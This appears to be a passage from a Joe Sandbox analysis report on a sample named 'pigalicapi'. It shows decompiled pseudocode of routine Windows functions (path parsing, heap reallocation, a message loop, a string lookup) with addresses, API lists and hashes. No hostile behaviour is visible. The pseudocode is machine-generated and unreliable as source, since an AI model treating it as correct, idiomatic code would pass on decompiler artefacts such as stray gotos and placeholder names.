                                                                                                                                                                                                                                                                                          				signed int _t53;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t54;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t47 = __edx;
                                                                                                                                                                                                                                                                                          				_t19 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t19 ^ _t53;
                                                                                                                                                                                                                                                                                          				_t50 = __ecx;
                                                                                                                                                                                                                                                                                          				_t52 = __ecx + 0x38;
                                                                                                                                                                                                                                                                                          				_v280 = __ecx;
                                                                                                                                                                                                                                                                                          				_t38 = __edx;
                                                                                                                                                                                                                                                                                          				 *_t54 = 0;
                                                                                                                                                                                                                                                                                          				if(E0080CCE0(__ecx + 0x38, __ecx) != 0) {
                                                                                                                                                                                                                                                                                          					_t23 =  *_t38;
                                                                                                                                                                                                                                                                                          					__eflags = _t23;
                                                                                                                                                                                                                                                                                          					if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          						__eflags = _t23 - 0x22;
                                                                                                                                                                                                                                                                                          						if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          							_t38 =  &(_t38[1]);
                                                                                                                                                                                                                                                                                          							_t52 = 0;
                                                                                                                                                                                                                                                                                          							__eflags = lstrlenA(_t38);
                                                                                                                                                                                                                                                                                          							if(__eflags > 0) {
                                                                                                                                                                                                                                                                                          								while(1) {
                                                                                                                                                                                                                                                                                          									__eflags =  *((char*)(_t52 + _t38)) - 0x22;
                                                                                                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          										break;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t52 = _t52 + 1;
                                                                                                                                                                                                                                                                                          									__eflags = _t52 - lstrlenA(_t38);
                                                                                                                                                                                                                                                                                          									if(__eflags < 0) {
                                                                                                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L11;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								 *((char*)(_t52 + _t38)) = 0;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							L11:
                                                                                                                                                                                                                                                                                          							_t50 = _v280;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v284 = 0;
                                                                                                                                                                                                                                                                                          						GetFullPathNameA(_t38, 0x104,  &_v276,  &_v284);
                                                                                                                                                                                                                                                                                          						_t48 = _v284;
                                                                                                                                                                                                                                                                                          						_t28 = E00808380(_t50 + 0x38, __eflags,  &_v276, _v284);
                                                                                                                                                                                                                                                                                          						__eflags = _t28;
                                                                                                                                                                                                                                                                                          						if(_t28 != 0) {
                                                                                                                                                                                                                                                                                          							_t38 = _t50 + 0x140;
                                                                                                                                                                                                                                                                                          							E0080B170(_t50 + 0x140,  &_v276, _t48);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						E00808220(_t52, __eflags);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					ShowWindow( *(_t50 + 0x3c), _a4);
                                                                                                                                                                                                                                                                                          					_t30 = E008049A0(_a4, _t50);
                                                                                                                                                                                                                                                                                          					__eflags = _v8 ^ _t53;
                                                                                                                                                                                                                                                                                          					return E008159E6(_t30, _t38, _v8 ^ _t53,  *(_t50 + 0x3c), _t50, _t52);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return E008159E6(_t22, _t38, _v8 ^ _t53, _t47, _t50, _t52);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                                          0x00809bc0
                                                                                                                                                                                                                                                                                          0x00809bc9
                                                                                                                                                                                                                                                                                          0x00809bd0
                                                                                                                                                                                                                                                                                          0x00809bd6
                                                                                                                                                                                                                                                                                          0x00809bdb
                                                                                                                                                                                                                                                                                          0x00809bde
                                                                                                                                                                                                                                                                                          0x00809be4
                                                                                                                                                                                                                                                                                          0x00809be6
                                                                                                                                                                                                                                                                                          0x00809bf3
                                                                                                                                                                                                                                                                                          0x00809c08
                                                                                                                                                                                                                                                                                          0x00809c0a
                                                                                                                                                                                                                                                                                          0x00809c0c
                                                                                                                                                                                                                                                                                          0x00809c1a
                                                                                                                                                                                                                                                                                          0x00809c1c
                                                                                                                                                                                                                                                                                          0x00809c24
                                                                                                                                                                                                                                                                                          0x00809c26
                                                                                                                                                                                                                                                                                          0x00809c2a
                                                                                                                                                                                                                                                                                          0x00809c2c
                                                                                                                                                                                                                                                                                          0x00809c30
                                                                                                                                                                                                                                                                                          0x00809c30
                                                                                                                                                                                                                                                                                          0x00809c34
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00809c37
                                                                                                                                                                                                                                                                                          0x00809c3a
                                                                                                                                                                                                                                                                                          0x00809c3c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00809c3e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00809c3c
                                                                                                                                                                                                                                                                                          0x00809c40
                                                                                                                                                                                                                                                                                          0x00809c40
                                                                                                                                                                                                                                                                                          0x00809c44
                                                                                                                                                                                                                                                                                          0x00809c44
                                                                                                                                                                                                                                                                                          0x00809c44
                                                                                                                                                                                                                                                                                          0x00809c5e
                                                                                                                                                                                                                                                                                          0x00809c68
                                                                                                                                                                                                                                                                                          0x00809c6e
                                                                                                                                                                                                                                                                                          0x00809c7f
                                                                                                                                                                                                                                                                                          0x00809c84
                                                                                                                                                                                                                                                                                          0x00809c86
                                                                                                                                                                                                                                                                                          0x00809c88
                                                                                                                                                                                                                                                                                          0x00809c94
                                                                                                                                                                                                                                                                                          0x00809c94
                                                                                                                                                                                                                                                                                          0x00809c0e
                                                                                                                                                                                                                                                                                          0x00809c10
                                                                                                                                                                                                                                                                                          0x00809c10
                                                                                                                                                                                                                                                                                          0x00809ca1
                                                                                                                                                                                                                                                                                          0x00809ca7
                                                                                                                                                                                                                                                                                          0x00809cb1
                                                                                                                                                                                                                                                                                          0x00809cbc
                                                                                                                                                                                                                                                                                          0x00809bf8
                                                                                                                                                                                                                                                                                          0x00809c05
                                                                                                                                                                                                                                                                                          0x00809c05

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 0080CCE0: LoadStringA.USER32 ref: 0080CD16
                                                                                                                                                                                                                                                                                            • Part of subcall function 0080CCE0: LoadMenuA.USER32 ref: 0080CD2B
                                                                                                                                                                                                                                                                                            • Part of subcall function 0080CCE0: LoadAcceleratorsA.USER32 ref: 0080CD91
                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,?,?,00000000,?,00000104,?,?), ref: 00809CA1
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Load$AcceleratorsMenuShowStringWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1999622886-0
                                                                                                                                                                                                                                                                                          • Opcode ID: d83e35715ab571ab84560c21377199fe419d85aa2318821f9e86b0c398507689
                                                                                                                                                                                                                                                                                          • Instruction ID: 0fcc163848f7d7a2ca536c0e3b5d74550119bead3ef45affb67267cb7f609190
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d83e35715ab571ab84560c21377199fe419d85aa2318821f9e86b0c398507689
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D21E972A0011C9BD769DF18DC82BEAB3E8FF85300F104199E589D7191DA70AD42CBE1
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                                                                                                          			E008193AB(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                                                                                                                                                                                                                                                                                          				void* _t7;
                                                                                                                                                                                                                                                                                          				long _t8;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t9;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t12;
                                                                                                                                                                                                                                                                                          				long _t27;
                                                                                                                                                                                                                                                                                          				long _t30;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                          					_push(__esi);
                                                                                                                                                                                                                                                                                          					_t30 = _a8;
                                                                                                                                                                                                                                                                                          					__eflags = _t30;
                                                                                                                                                                                                                                                                                          					if(_t30 != 0) {
                                                                                                                                                                                                                                                                                          						_push(__edi);
                                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                                          							__eflags = _t30 - 0xffffffe0;
                                                                                                                                                                                                                                                                                          							if(_t30 > 0xffffffe0) {
                                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							__eflags = _t30;
                                                                                                                                                                                                                                                                                          							if(_t30 == 0) {
                                                                                                                                                                                                                                                                                          								_t30 = _t30 + 1;
                                                                                                                                                                                                                                                                                          								__eflags = _t30;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t7 = HeapReAlloc( *0x881004, 0, _a4, _t30);
                                                                                                                                                                                                                                                                                          							_t27 = _t7;
                                                                                                                                                                                                                                                                                          							__eflags = _t27;
                                                                                                                                                                                                                                                                                          							if(_t27 != 0) {
                                                                                                                                                                                                                                                                                          								L17:
                                                                                                                                                                                                                                                                                          								_t8 = _t27;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								__eflags =  *0x88166c - _t7;
                                                                                                                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          									_t9 = E00817A0D(__eflags);
                                                                                                                                                                                                                                                                                          									 *_t9 = E008179CB(GetLastError());
                                                                                                                                                                                                                                                                                          									goto L17;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									__eflags = E00818912(_t7, _t30);
                                                                                                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          										_t12 = E00817A0D(__eflags);
                                                                                                                                                                                                                                                                                          										 *_t12 = E008179CB(GetLastError());
                                                                                                                                                                                                                                                                                          										L12:
                                                                                                                                                                                                                                                                                          										_t8 = 0;
                                                                                                                                                                                                                                                                                          										__eflags = 0;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						E00818912(_t6, _t30);
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(E00817A0D(__eflags))) = 0xc;
                                                                                                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						E00815DE2(_a4);
                                                                                                                                                                                                                                                                                          						_t8 = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                                                                                          					return _t8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return E00815E1C(__edx, __edi, __esi, _a8);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                                          0x008193b4
                                                                                                                                                                                                                                                                                          0x008193c1
                                                                                                                                                                                                                                                                                          0x008193c2
                                                                                                                                                                                                                                                                                          0x008193c5
                                                                                                                                                                                                                                                                                          0x008193c7
                                                                                                                                                                                                                                                                                          0x008193d6
                                                                                                                                                                                                                                                                                          0x00819409
                                                                                                                                                                                                                                                                                          0x00819409
                                                                                                                                                                                                                                                                                          0x0081940c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008193d9
                                                                                                                                                                                                                                                                                          0x008193db
                                                                                                                                                                                                                                                                                          0x008193dd
                                                                                                                                                                                                                                                                                          0x008193dd
                                                                                                                                                                                                                                                                                          0x008193dd
                                                                                                                                                                                                                                                                                          0x008193ea
                                                                                                                                                                                                                                                                                          0x008193f0
                                                                                                                                                                                                                                                                                          0x008193f2
                                                                                                                                                                                                                                                                                          0x008193f4
                                                                                                                                                                                                                                                                                          0x00819454
                                                                                                                                                                                                                                                                                          0x00819454
                                                                                                                                                                                                                                                                                          0x008193f6
                                                                                                                                                                                                                                                                                          0x008193f6
                                                                                                                                                                                                                                                                                          0x008193fc
                                                                                                                                                                                                                                                                                          0x0081943e
                                                                                                                                                                                                                                                                                          0x00819452
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008193fe
                                                                                                                                                                                                                                                                                          0x00819405
                                                                                                                                                                                                                                                                                          0x00819407
                                                                                                                                                                                                                                                                                          0x00819426
                                                                                                                                                                                                                                                                                          0x0081943a
                                                                                                                                                                                                                                                                                          0x00819420
                                                                                                                                                                                                                                                                                          0x00819420
                                                                                                                                                                                                                                                                                          0x00819420
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00819407
                                                                                                                                                                                                                                                                                          0x008193fc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00819422
                                                                                                                                                                                                                                                                                          0x0081940f
                                                                                                                                                                                                                                                                                          0x0081941a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008193c9
                                                                                                                                                                                                                                                                                          0x008193cc
                                                                                                                                                                                                                                                                                          0x008193d2
                                                                                                                                                                                                                                                                                          0x008193d2
                                                                                                                                                                                                                                                                                          0x00819423
                                                                                                                                                                                                                                                                                          0x00819425
                                                                                                                                                                                                                                                                                          0x008193b6
                                                                                                                                                                                                                                                                                          0x008193c0
                                                                                                                                                                                                                                                                                          0x008193c0

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 008193B9
                                                                                                                                                                                                                                                                                            • Part of subcall function 00815E1C: __FF_MSGBANNER.LIBCMT ref: 00815E35
                                                                                                                                                                                                                                                                                            • Part of subcall function 00815E1C: __NMSG_WRITE.LIBCMT ref: 00815E3C
                                                                                                                                                                                                                                                                                            • Part of subcall function 00815E1C: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00819160,?,00000001,?,?,0081A609,00000018,00824600,0000000C,0081A699), ref: 00815E61
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocateHeap_malloc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 501242067-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 987a352810bd76578a881417e645037cc4d16cb1b9ec8f705dcf3827adb1b299
                                                                                                                                                                                                                                                                                          • Instruction ID: 95658e8cc4d776630b8b2368d8eabd200bd19f907f526670f5b49cd46c5d6647
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 987a352810bd76578a881417e645037cc4d16cb1b9ec8f705dcf3827adb1b299
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6711E732408614ABCF323B78BC156DE3BACFF403B0B204429F499CA291DF3089C29B95
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                          			E008049A0(void* __ecx, intOrPtr* __edi) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				int _t8;
                                                                                                                                                                                                                                                                                          				intOrPtr _t11;
                                                                                                                                                                                                                                                                                          				intOrPtr _t15;
                                                                                                                                                                                                                                                                                          				void* _t19;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t26;
                                                                                                                                                                                                                                                                                          				MSG* _t28;
                                                                                                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                                                                                                          				void* _t39;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t26 = __edi;
                                                                                                                                                                                                                                                                                          				_t28 = __edi + 0x1c;
                                                                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                                                                          					_t19 = 0;
                                                                                                                                                                                                                                                                                          					_v8 = 1;
                                                                                                                                                                                                                                                                                          					goto L2;
                                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                                          						do {
                                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                                          								L2:
                                                                                                                                                                                                                                                                                          								if(_v8 != 0) {
                                                                                                                                                                                                                                                                                          									while(PeekMessageA(_t28, 0, 0, 0, 0) == 0) {
                                                                                                                                                                                                                                                                                          										_t11 =  *((intOrPtr*)( *((intOrPtr*)( *_t26 + 4))))(_t19);
                                                                                                                                                                                                                                                                                          										_t19 = _t19 + 1;
                                                                                                                                                                                                                                                                                          										if(_t11 != 0) {
                                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_v8 = _t11;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										goto L6;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								L6:
                                                                                                                                                                                                                                                                                          								_t8 = GetMessageA(_t28, 0, 0, 0);
                                                                                                                                                                                                                                                                                          							} while (_t8 == 0xffffffff);
                                                                                                                                                                                                                                                                                          							if(_t8 != 0) {
                                                                                                                                                                                                                                                                                          								_push(_t28);
                                                                                                                                                                                                                                                                                          								if( *((intOrPtr*)( *((intOrPtr*)( *_t26))))() == 0) {
                                                                                                                                                                                                                                                                                          									TranslateMessage(_t28);
                                                                                                                                                                                                                                                                                          									DispatchMessageA(_t28);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t15 =  *((intOrPtr*)(_t26 + 0x20));
                                                                                                                                                                                                                                                                                          								_t37 = _t15 - 0x118;
                                                                                                                                                                                                                                                                                          								if(_t37 > 0) {
                                                                                                                                                                                                                                                                                          									goto L15;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									goto L11;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								L18:
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							return  *((intOrPtr*)(_t26 + 0x24));
                                                                                                                                                                                                                                                                                          							goto L18;
                                                                                                                                                                                                                                                                                          							L11:
                                                                                                                                                                                                                                                                                          						} while (_t37 == 0 || _t15 == 0xf);
                                                                                                                                                                                                                                                                                          						_t39 = _t15 - 0xa0;
                                                                                                                                                                                                                                                                                          						L15:
                                                                                                                                                                                                                                                                                          					} while (_t39 == 0);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                                          0x008049a0
                                                                                                                                                                                                                                                                                          0x008049a6
                                                                                                                                                                                                                                                                                          0x008049a9
                                                                                                                                                                                                                                                                                          0x008049a9
                                                                                                                                                                                                                                                                                          0x008049ab
                                                                                                                                                                                                                                                                                          0x008049ab
                                                                                                                                                                                                                                                                                          0x008049b2
                                                                                                                                                                                                                                                                                          0x008049b2
                                                                                                                                                                                                                                                                                          0x008049b2
                                                                                                                                                                                                                                                                                          0x008049b2
                                                                                                                                                                                                                                                                                          0x008049b6
                                                                                                                                                                                                                                                                                          0x008049b8
                                                                                                                                                                                                                                                                                          0x008049d3
                                                                                                                                                                                                                                                                                          0x008049d5
                                                                                                                                                                                                                                                                                          0x008049d8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008049da
                                                                                                                                                                                                                                                                                          0x008049da
                                                                                                                                                                                                                                                                                          0x008049da
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008049d8
                                                                                                                                                                                                                                                                                          0x008049b8
                                                                                                                                                                                                                                                                                          0x008049dd
                                                                                                                                                                                                                                                                                          0x008049e4
                                                                                                                                                                                                                                                                                          0x008049ea
                                                                                                                                                                                                                                                                                          0x008049f1
                                                                                                                                                                                                                                                                                          0x008049f7
                                                                                                                                                                                                                                                                                          0x008049fe
                                                                                                                                                                                                                                                                                          0x00804a01
                                                                                                                                                                                                                                                                                          0x00804a08
                                                                                                                                                                                                                                                                                          0x00804a08
                                                                                                                                                                                                                                                                                          0x00804a0e
                                                                                                                                                                                                                                                                                          0x00804a11
                                                                                                                                                                                                                                                                                          0x00804a16
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00804a16
                                                                                                                                                                                                                                                                                          0x00804a3a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00804a18
                                                                                                                                                                                                                                                                                          0x00804a18
                                                                                                                                                                                                                                                                                          0x00804a1f
                                                                                                                                                                                                                                                                                          0x00804a2b
                                                                                                                                                                                                                                                                                          0x00804a2b
                                                                                                                                                                                                                                                                                          0x00804a2d

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 008049C1
                                                                                                                                                                                                                                                                                          • GetMessageA.USER32 ref: 008049E4
                                                                                                                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 00804A01
                                                                                                                                                                                                                                                                                          • DispatchMessageA.USER32 ref: 00804A08
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message$DispatchPeekTranslate
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4217535847-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 62dc953030e5cc0b580d71438f143edd03d999aa5df3da05011aa58bf05c52a6
                                                                                                                                                                                                                                                                                          • Instruction ID: e938654ddbe6757c49ffb54115a5f25a24fd2396d59e7e9145002471dcb99ff8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62dc953030e5cc0b580d71438f143edd03d999aa5df3da05011aa58bf05c52a6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C11A0B0381215ABE7609B58CD89BAAB7A8FF45305F209162F705D72E0D374ED528AC5
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E0080B3E0(intOrPtr* __ebx, void* __edi, intOrPtr _a4, CHAR* _a8) {
                                                                                                                                                                                                                                                                                          				intOrPtr _t5;
                                                                                                                                                                                                                                                                                          				signed int _t18;
                                                                                                                                                                                                                                                                                          				signed int _t23;
                                                                                                                                                                                                                                                                                          				CHAR* _t25;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t5 =  *((intOrPtr*)(__ebx + 4));
                                                                                                                                                                                                                                                                                          				_t23 = _t5 - _a4 + 0xe10f;
                                                                                                                                                                                                                                                                                          				if(_t23 < 0 || _t23 >= _t5) {
                                                                                                                                                                                                                                                                                          					L9:
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t18 = _t23 * 0x104;
                                                                                                                                                                                                                                                                                          					if(lstrlenA( *__ebx + _t18) < 0x104) {
                                                                                                                                                                                                                                                                                          						if(_t23 >=  *((intOrPtr*)(__ebx + 4))) {
                                                                                                                                                                                                                                                                                          							RaiseException(0xc000008c, 1, 0, 0);
                                                                                                                                                                                                                                                                                          							goto L9;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t25 =  *__ebx + _t18;
                                                                                                                                                                                                                                                                                          							if(lstrlenA(_t25) < 0x104) {
                                                                                                                                                                                                                                                                                          								lstrcpyA(_a8, _t25);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                                                                          0x0080b3e3
                                                                                                                                                                                                                                                                                          0x0080b3ec
                                                                                                                                                                                                                                                                                          0x0080b3f2
                                                                                                                                                                                                                                                                                          0x0080b459
                                                                                                                                                                                                                                                                                          0x0080b45d
                                                                                                                                                                                                                                                                                          0x0080b3f8
                                                                                                                                                                                                                                                                                          0x0080b3fd
                                                                                                                                                                                                                                                                                          0x0080b411
                                                                                                                                                                                                                                                                                          0x0080b41e
                                                                                                                                                                                                                                                                                          0x0080b453
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080b420
                                                                                                                                                                                                                                                                                          0x0080b422
                                                                                                                                                                                                                                                                                          0x0080b430
                                                                                                                                                                                                                                                                                          0x0080b437
